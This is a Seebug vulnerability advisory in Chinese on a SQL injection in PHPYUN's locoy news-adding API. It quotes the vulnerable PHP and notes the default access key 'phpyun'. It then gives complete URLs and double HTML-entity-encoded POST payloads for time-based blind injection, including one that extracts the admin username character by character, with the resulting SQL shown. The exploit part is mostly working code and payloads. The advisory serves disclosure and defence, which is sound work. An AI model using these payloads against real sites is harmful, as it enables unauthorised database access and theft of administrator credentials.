PHPYUN无视GPC(可注入全站信息)

2015-07-20T00:00:00
ID SSV:93990
Type seebug
Reporter Root
Modified 2015-07-20T00:00:00

Description

简要描述:

PHPYUN无视GPC(可注入全站信息) 180个字符的注入,等于没有限制,什么都能注入出来

详细说明:

首先我们看这个文件: api/locoy/model/news.class.php:

`` class news_controller extends common{ function addnews_action(){//新闻添加 include("locoy_config.php"); if($locoyinfo['locoy_online']!=1){ echo 4;die; } if($locoyinfo['locoy_key']!=trim($_GET['key'])){ echo 5;die; } if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){ echo 2;die; } $row=$this->obj->DB_select_once("news_base","title='".trim($_POST['title'])."' andnid`='".$_POST['nid']."'"); if(is_array($row)){ echo 3;die; } $content=$_POST['content'];

    $value="";
    $value.="`title`='".trim($_POST['title'])."',";
    $value.="`nid`='".$_POST['nid']."',";
    $value.="`did`='0',";
    $value.="`author`='".$_POST['author']."',";
    $description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");
    $description=$_POST['description']?$_POST['description']:$description;
    $description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);
    $value.="`description`='".$description."',";
    $value.="`source`='".$_POST['source']."'";
    if($_POST['ctime']){
        $value.=",`datetime`='".strtotime($_POST['ctime'])."'";
    }else{
        $value.=",`datetime`='".time()."'";
    }
    if($_POST['hits']){
        $value.=",`hits`='".trim($_POST['hits'])."'";
    }else{
        $row=explode('-',$locoyinfo['locoy_rand']);
        if(is_array($row)){
            $rand=rand(trim($row[0]),trim($row[1]));
        }else{
            $rand=!trim($row)?0:$row;
        }
        $value.=",`hits`='".$rand."'";
    }
    if($_POST['sort']){
        $value.=",`sort`='".trim($_POST['sort'])."'";
    }else{
        $row=explode('-',$locoyinfo['locoy_sort']);
        if(is_array($row)){
            $rand=rand(trim($row[0]),trim($row[1]));
        }else{
            $rand=!trim($row)?0:$row;
        }
        $value.=",`sort`='".$rand."'";
    }
    if($_POST['newsphoto']){
        $value.=",`newsphoto`='".trim($_POST['newsphoto'])."'";
    }
    if($_POST['s_thumb']){
        $value.=",`s_thumb`='".trim($_POST['s_thumb'])."'";
    }
   if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){
        require(LIB_PATH."lib_splitword_class.php");
        $sp = new SplitWord();
        $keywordarr=$sp->getkeyword(strip_tags(html_entity_decode($content)));
        $value.=",`keyword`='".strip_tags(@implode(",",$keywordarr))."'";
    }elseif($_POST['keyword']){
        $value.=",`keyword`='".str_replace(",",",",$_POST['keyword'])."'";
    }
    $new_base = $this->obj->DB_insert_once("news_base",$value);

```

这个里面有几个条件要说明一下: 1.$locoyinfo['locoy_key']!=trim($GET['key']) 我们搜索一下: locoy_config.php里面 默认安装的话,就是 $locoyinfo=array("locoy_online"=>"1","locoy_name"=>"yun","locoy_pwd"=>"12345678","locoy_key"=>"phpyun","co 找来找去都没有发现设置更改这个配置的地方,在后台的添加新闻的地方也没有找到,不管这个配置是硬编码的还是怎么样,反正是默认配置 条件2: $row=$this->obj->DB_select_once("news_base","title='".trim($_POST['title'])."' and nid='".$_POST['nid']."'"); if(is_array($row)){ echo 3;die; } 这个语句必须查不到,也就是说数据库里面不存在这个新闻 条件3 if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){ 这个逻辑不要进来,不然就会报错 然后我们看看问题点:

$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk"); $description=$_POST['description']?$_POST['description']:$description; $description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);

发现了没有我们只要对数据进行实体编码即可 所有的空格都会被去掉,那么我们比如sleep(5)可以写成slee p(5) 解码后有180个字符的范围,那么我们就可以什么都能注射出来 url: http://localhost/phpyun40https://images.seebug.org/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun postdata: title=xxxx&content=1'slee p(5)#&nid=567&keyword=xxxxxx 编码一层: title=xxxx&content=1'*slee p(5)#&nid=567&keyword=xxxxxx 再编码一层: title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx 这样发送url: http://localhost/phpyun40https://images.seebug.org/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun postdata: title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx 后台抓取sql为: INSERT INTO phpyun_news_base SET title='xxxx',nid='567',did='0',author='',description='1'sleep(5)#',source='',datetime='1437052963',hits='',sort='',keyword='xxxxxx'

<img src="https://images.seebug.org/upload/201507/16212155ccf0db6ff493d5af509068213bc9e162.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

后续进行猜测的,180个字符随便来,记得里面的nid每次请求一次都要变一次 在所有的关键字里面都加一个空格 postdata: title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23105%3B%26%2332%3B%26%23102%3B%26%2340%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23105%3B%26%23105%3B%26%2340%3B%26%23115%3B%26%23117%3B%26%2398%3B%26%23115%3B%26%23116%3B%26%23114%3B%26%2340%3B%26%2340%3B%26%23115%3B%26%23101%3B%26%23108%3B%26%23101%3B%26%2332%3B%26%2399%3B%26%23116%3B%26%2396%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23110%3B%26%2397%3B%26%23109%3B%26%23101%3B%26%2396%3B%26%23102%3B%26%23114%3B%26%2332%3B%26%23111%3B%26%23109%3B%26%2396%3B%26%23112%3B%26%23104%3B%26%23112%3B%26%23121%3B%26%23117%3B%26%23110%3B%26%2395%3B%26%2397%3B%26%23100%3B%26%23109%3B%26%23105%3B%26%23110%3B%26%2395%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%2396%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2341%3B%26%2361%3B%26%2357%3B%26%2355%3B%26%2344%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2335%3B&nid=5671&keyword=xxxxxx 抓取sql为: INSERT INTO phpyun_news_base SET title='xxxx',nid='5671',did='0',author='',description='1'*if(ascii(substr((selectusernamefromphpyun_admin_user),1,1))=97,sleep(5),1)#',source='',datetime='1437053421',hits='',sort='',keyword='xxxxxx'

漏洞证明: